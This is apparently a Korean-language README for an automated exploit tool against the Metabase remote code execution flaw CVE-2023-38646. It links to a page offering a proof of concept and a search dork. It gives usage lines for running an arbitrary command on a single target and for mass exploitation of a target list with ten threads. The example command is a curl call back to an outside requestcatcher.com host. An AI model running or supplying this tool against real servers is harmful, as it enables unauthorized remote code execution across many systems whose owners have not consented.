
CVE-2023-38646으로 알려진 Metabase Exploit을 위한 자동 도구
CVE-2023-38646로 알려진 Metabase RCE 익스플로잇을 위한 자동 도구입니다. 자세한 내용(POC, Dork)은 https://secry.me/explore/news/metabase-rce-cve-2023-38646/ 에서 확인하세요.

python3 single.py --url=http://127.0.0.1:8080 --command="curl sub.requestcatcher.com/some-endpoint"
또는
python3 single.py -u http://127.0.0.1:8080 -c "curl sub.requestcatcher.com/some-endpoint"

python3 mass.py -f target.txt -t 10 -c "curl sub.requestcatcher.com/some-endpoint" -o output.txt
또는
python3 mass.py --file=target.txt --threads=10 --command="curl sub.requestcatcher.com/some-endpoint" --output="output.txt"